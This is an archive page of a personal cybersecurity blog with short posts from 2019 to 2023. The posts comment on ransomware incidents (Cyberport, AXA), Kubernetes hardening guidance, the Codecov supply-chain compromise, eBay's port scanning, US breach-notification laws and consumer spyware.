Category Archives: Data privacy

Hong Kong Cyberport is plagued by ransomware! (15th Sep 2023)

Preface: On 13th Sep 2023, There is another new development in the cyberport hacker incident, said wepro180[.]com. The 400GB of stolen data was disclosed on the dark web on Tuesday (12/9), including employee salaries, applicant resumes, credit card information and other sensitive documents. Cyberport said it has directly contacted those who may be affected.

Think about it after you know it

About the Computer Functional Footprint – Business users are storing some data in SharePoint lists. Perhaps enterprise firm operation management need to do report and analytic. So, it is common to select popular solution. ETL processes extract data from different sources, transforms it, and loads it into data warehouse (MSSQL).

By default the CLR is not enabled in SQL Server. When you use SQL server CLR function, you can code stored procedures, triggers,  user-defined functions, user-defined aggregates, and user-defined types using Microsoft .NET code; e.g. Visual Basic .NET or C#. 

For example: table-value function (TVF) written using the CLR function.

The rise of the ransomware power

In April 2023, Trigona began targeting compromised MSSQL servers by stealing credentials through brute-force methods, according to observations by cybersecurity experts. But the group began operating actively on the Internet around late October 2022.

Trigona’s operators use CLR shell on attacks launched against MS-SQL servers. Perhaps their aim of targeting SQL servers which contains design weakness. All versions of Trigona employ  TDCP_rijndael (AES) to encrypt the target files currently.

My comment: Any software and hardware design is to help people improve operating efficiency. In theory we all know about protection, defense and mitigation. However, when dealing with today’s demanding business world and multi-solution environments. Talk about cybersecurity should be accompanied by practical support. However, the market is highly competitive and the establishment of any new project will bring the burden of network security. Sometimes it’s a trade-off on the part of the business owner or management team.

Kubernetes Hardening Guidance by NSA & CISA (3rd Aug 2021)

Preface: Docker helps to “create” containers, and Kubernetes allows you to “manage” them at runtime. What is Kubernetes Security? That is Cloud, Cluster, Container and code.

Background: Kubernetes is commonly targeted for three reasons observing by NSA and CISA. They are data theft, computational power theft, or denial of service. Cyber attacks encountered in the Kubernetes environment in 2020. Details are as follow:

Capital One – Occurring in 2019, this breach saw 30GB of credit application data affecting about 106 million people being exfiltrated.
A mis-configured firewall that allowed an attacker to query internal metadata and gain credentials of an Amazon Web Services
Docker hub – Attackers managed to plant malicious images in the Docker hub. unknowingly deployed cryptocurrency miners in the form of Docker
containers that then diverted compute resources toward mining cryptocurrency for the attacker.
Microsoft Azure – Microsoft is another organization that’s been seeing a lot of cryptojacking woes of its own. After disclosing that there was a large-scale cryptomining attack against Kubernetes cluster in Azure in April 2020.
Telsa – Automaker Tesla was one of the earlier victims of cryptojacking when a Kubernetes cluster was compromised due to an administrative
console not being password protected.(Mis-configuration)
Jenkins – Hackers managed to exploit a vulnerability in Jenkins to cryptomine to the tune of about $3.5 million, or 10,800 Monero in 18 months. In Docker’s operation environment, it was discovered that six malicious images had been collectively pulled over 2 million times, that’s 2 million users potentially mining Monero for the attacker.

To avoid similar incidents from happening – The National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report, “Kubernetes Hardening Guidance,” Primary actions include the scanning of containers and Pods for vulnerabilities or mis-configurations, running containers and Pods with the least privileges possible, and using network separation, firewalls, strong authentication, and log auditing. Please refer to the link for details – https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2716980/nsa-cisa-release-kubernetes-hardening-guidance/

Aforementioned – Insurance company infected by ransomware – 25th May 2021

News feed: AXA Group announced on Sunday (16-05-2021) that the company has become a victim of a ransomware attack. Axa Hong Kong said there has been no evidence that data processed by Inter Partners Asia in markets other than Thailand have been affected by the targeted ransomware attack. No official announcement till today to update this incident.

Technology exploration: Avaddon ransomware performs an encryption in offline mode using AES-256 + RSA-2048 to encrypt files. With AES128-bit key, the task of cracking AES by checking each of the 2128 possible key values (a “brute force” attack) is so computationally intensive that even the fastest supercomputer would require, on average, more than 100 trillion years to do it. Microsoft .NET Cryptography library is capable to encrypt and decrypt file on his own.
The Windows 10 operating system incorporates the . NET Framework 4 installed and enabled by default. Therefore cybercriminal can share this service. For more details, please refer to attached document.

What is the consequence if AXA underestimate this matter? Or it is just a bluff!

A similar type of attack (files encrypted with RSA-2048 and AES-128 passwords) will allow cyber-criminals to gain access through remote control systems. After the machine is infected with the ransomware. The data exfiltration will be occurred. In fact, the hacker group claimed to have stolen 3 terabytes of data, including a long list of information: ID cards, passport copies, customer claims, reserved agreements, denied reimbursements, payments to customers, contract and reports, customer IDs and bank account scanned papers, hospital and doctor reserved material (private investigation for fraud) and customer medical reports including HIV, hepatitis, STD and other illness reports.

Latest news: https://www.thestandard.com.hk/section-news/section/2/230327/Axa-HK-unaffected-by-cyberattack

CISA urge to public that to aware of Codecov software vulnerability – 30th Apr, 2021

Preface: CISA is aware of a compromise of the Codecov software supply chain in which a malicious threat actor made unauthorized alterations of Codecov’s Bash Uploader script, beginning on January 31, 2021.

Background: A Supply Chain Attack Gone Undetected for 2 Months.Codecov has over 29,000 enterprise customers, including reputed names like Atlassian, Washington Post, GoDaddy, Royal Bank of Canada, and Procter & Gamble.

Vulnerability details: Regarding to this cyber security incident, Through vendor investigation, they are now have additional information concerning what environment variables may have been obtained without authorization and how they may have been used. The issue occurred due to an error in Codecov’s Docker image creation process that enabled the actors to extract sensitive credentials and modify the Bash Uploader script. Meanwhile it let the attacker exfiltrate sensitive information. For more details, please refer to link – https://about.codecov.io/security-update/

Ebayer, are you aware someone behind you? 25th may 2020

Preface: Host discovery function embedded detection and vulnerability scan service. Under normal circumstances, since you are on a private network, there is no objection in this setting.

Synopsis: When visiting the eBay, a script will run that performs a local port scan of your computer to detect remote support and remote access applications, said bleeping computer.

Verification: Refer to the “Bleeping Computer” information. (https://www.bleepingcomputer.com/news/security/ebay-port-scans-visitors-computers-for-remote-access-programs/) There is already a program script on the eBay front-end Web portal, which has a scanning function, please refer to the following url (https://src.ebay-us.com/fp/check.js?org_id=usllpic0&session_id=1) . Apart from that this matter lure my interest to know the details. Following my analysis step, it also found current user profile has design weakness (SQL injection). Perhaps this issue was only detected when the user logged in. Now return the focus to the scan function. From technical point of view, it is not 100% guarantee on existing protection mechanism can avoid session fixation. So eBay should be aware of it. For the details of session fixation. Please refer below:

Wiki: Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application.

Comment: I am the eBayer since 2000. However I could not find the official announcement that eBay is going to scan my device. Perhaps I am not the only one has this unsatisfied feeling.

Discarded Tesla car parts contain information. Maybe you can buy it on eBay. Who can believe in the technological world? Even if no such incident occurs, the supplier can read your local data without your consent (8th May 2020)

Preface: The traditional method of disposing of hard drives is degaussing or incineration.

Headline News: The manufacturer has a hardware disposal policy. The incidents encountered by Tesla may be due to improper handling of third parties. For more information about headline news, please refer to this link. https://www.hackread.com/user-data-found-in-tesla-car-parts-ebay/

Supplement: Should you have doubt about your data personal privacy matter in IoT device? You might have interested to read the following.

Who can you trust in the Internet world? Security Issues with LOAD DATA LOCAL in MySQL DB.

Technical overview:
Security Issues with LOAD DATA LOCAL on MySQL DB server side:
Such a server could access any file on the client host to which the client user has read access. Please refer to this link to read the details – http://www.antihackingonline.com/application-development/who-can-you-trust-in-the-internet-world-security-issues-with-load-data-local-in-mysql-db/

Official announcement – Security Considerations for LOAD DATA LOCAL. Please refer to this URL: https://dev.mysql.com/doc/refman/8.0/en/load-data-local-security.html

Do you worry your camera on your iphone manipulate by hacker. 6th Apr 2020

Preface: Apple paid $75,000 to the hacker for reporting the camera hijacking bugs. As said, bug is never ending. Perhaps next round will be yours.

Background: If you let your friend access your phone for 5–7 minutes, they could have downloaded spyware. Perhaps this action only for joking. As a matter of fact, hacker can implant malicious code into a web page to conduct the similar function. Most recently, Apple paid $75,000 to the hacker for reporting the camera hijacking bugs.

Observation: Referring to the attached picture, a simple html file can easily trigger the iphone camera function. Because the control effect of apple is very good. Therefore, it will trigger the control and then let you know. In fact, a hacker hijacked your iPhone camera through a software application or website. However, the iPhone owner can know which application can access your camera. Therefore, it is recommended to check the phone settings in a timely manner. Apple paid $75,000 to the hacker for reporting the camera hijacking bugs. As said, bug is never ending. Perhaps next round will be yours.

Chrome and Safari on iOS can access your lens without special markup and can perform both AJAX POST and synchronous form POST operations just like a desktop browser. So, please be careful to use your phone doing web browsing.

Marriott says 5.2 million guest records were stolen in another data breach, said Marriott. 31st Mar 2020

Preface: Perhaps this is not the key factor causes data breach on Jan 2020. But the sound can tell.

Observation: It is believed that a new round of data breaches by Marriott this week has attracted attention. Maybe the hotel industry will run within 24 hours. Do maintenance or system upgrade is not easy. We only look at the homepage of Marriott’s “Member Credit Card Rewards”. Found a vulnerable “jquery” still in operation. From attacker point of view, such hints similar give him an indication that this web site may have more space for exploitation. As we know, jQuery(version 1.11.3) which has XSS vulnerability found on March, 2017. Why still valid in an enterprise web site. The root cause is hard to tell. May be it is a extend legacy web application. I think you will be concern the details of official announcement. See below url:

https://mysupport.marriott.com/

Outline the definition of data breach law in five major U.S. population areas – Mar 2020

Preface: For those who conducting Ransomware attack to another person may be considered a data breach under federal or state law. While attempting to unlock and save its data, a victim of a ransomware attack may have an obligation to enact its data breach protocol and notify individuals whose data is affected by the attack.

Perhaps cybersecurity experts will focus on design weaknesses, including the circumstances under which data breaches can occur. We all know that the GDPR brings the subject of data privacy to court. The fine will be based on the actual situation. But GDPR regulations are valid in European countries. What about the United States of America?

About who must obey the law:

New York (N.Y. Gen. Bus. Law § 899-AA, N.Y. State Tech. Law 208)- https://www.nmlegis.gov/Sessions/17%20Regular/final/HB0015.pdf

California (Cal. Civ. Code §§ 1798.29, 1798.82) – http://leginfo.legislature.ca.gov/faces/codes_displaySection.xhtml?lawCode=CIV&sectionNum=1798.82

Illinois (815 ILCS §§ 530/1 to 530/25) – http://www.ilga.gov/legislation/ilcs/ilcs3.asp?ActID=2702&ChapAct=815%C2%A0ILCS%C2%A0530/&ChapterID=67&ChapterName=BUSINESS+TRANSACTIONS&ActName=Personal+Information+Protection+Act

Texas (Tex. Bus. & Com. Code §§ 521.002, 521.053) – https://statutes.capitol.texas.gov/Docs/BC/htm/BC.521.htm#521.002

Arizona (Ariz. Rev. Stat. § 18-545) – https://www.azleg.gov/viewDocument/?docName=http://www.azleg.gov/ars/18/00545.htm

Pennsylvania (73 Pa. Stat. §§ 2301 et seq) – https://govt.westlaw.com/pac/Browse/Home/Pennsylvania/UnofficialPurdonsPennsylvaniaStatutes?guid=N9B3F41908C4F11DA86FC8D90DD1949D4&originationContext=documenttoc&transitionType=Default&contextData=(sc.Default)

Please be vigilant. Spyware will be installed on your phone at any time – Oct 2019

Preface: Since the spyware runs in a stealth mode, it will let you track the device without being detected.

Background: Patroit Act empower law enforcement agency or related department can legally monitor the movements of suspect especially Terrorism. And therefore law enforcement agency will be used spyware monitor what’ the target movement. As time goes by, quite a lot of software vendors do a transformation of mobile phone monitoring tool (spyware) to consumer product. Flexispy and Spyzie are popular in the market. You can purchase this product though vendor web portal. The slogan by vendor is that no rooting or jailbreaking required. It can easy to track SMS, CallLogs, Social Apps and locations.

Legal point of view: If the spyware was ‘used on a case,’ a detail document of report should be provided. Given the functionality of FlexiSpy, it would require a wiretap order, not just a search and seizure warrant, said attorney.

The reasons why cyber criminals want to hack your phone?

  • To eavesdrop on calls
  • To steal money
  • To blackmail people

So the Federal Trade Commission recommended Smartphone users who suspect an illegitimate stalking app on their device should consider their recommendations. Refer to URL for more details. https://www.consumer.ftc.gov/blog/2019/10/stalking-apps-retina-x-settles-charges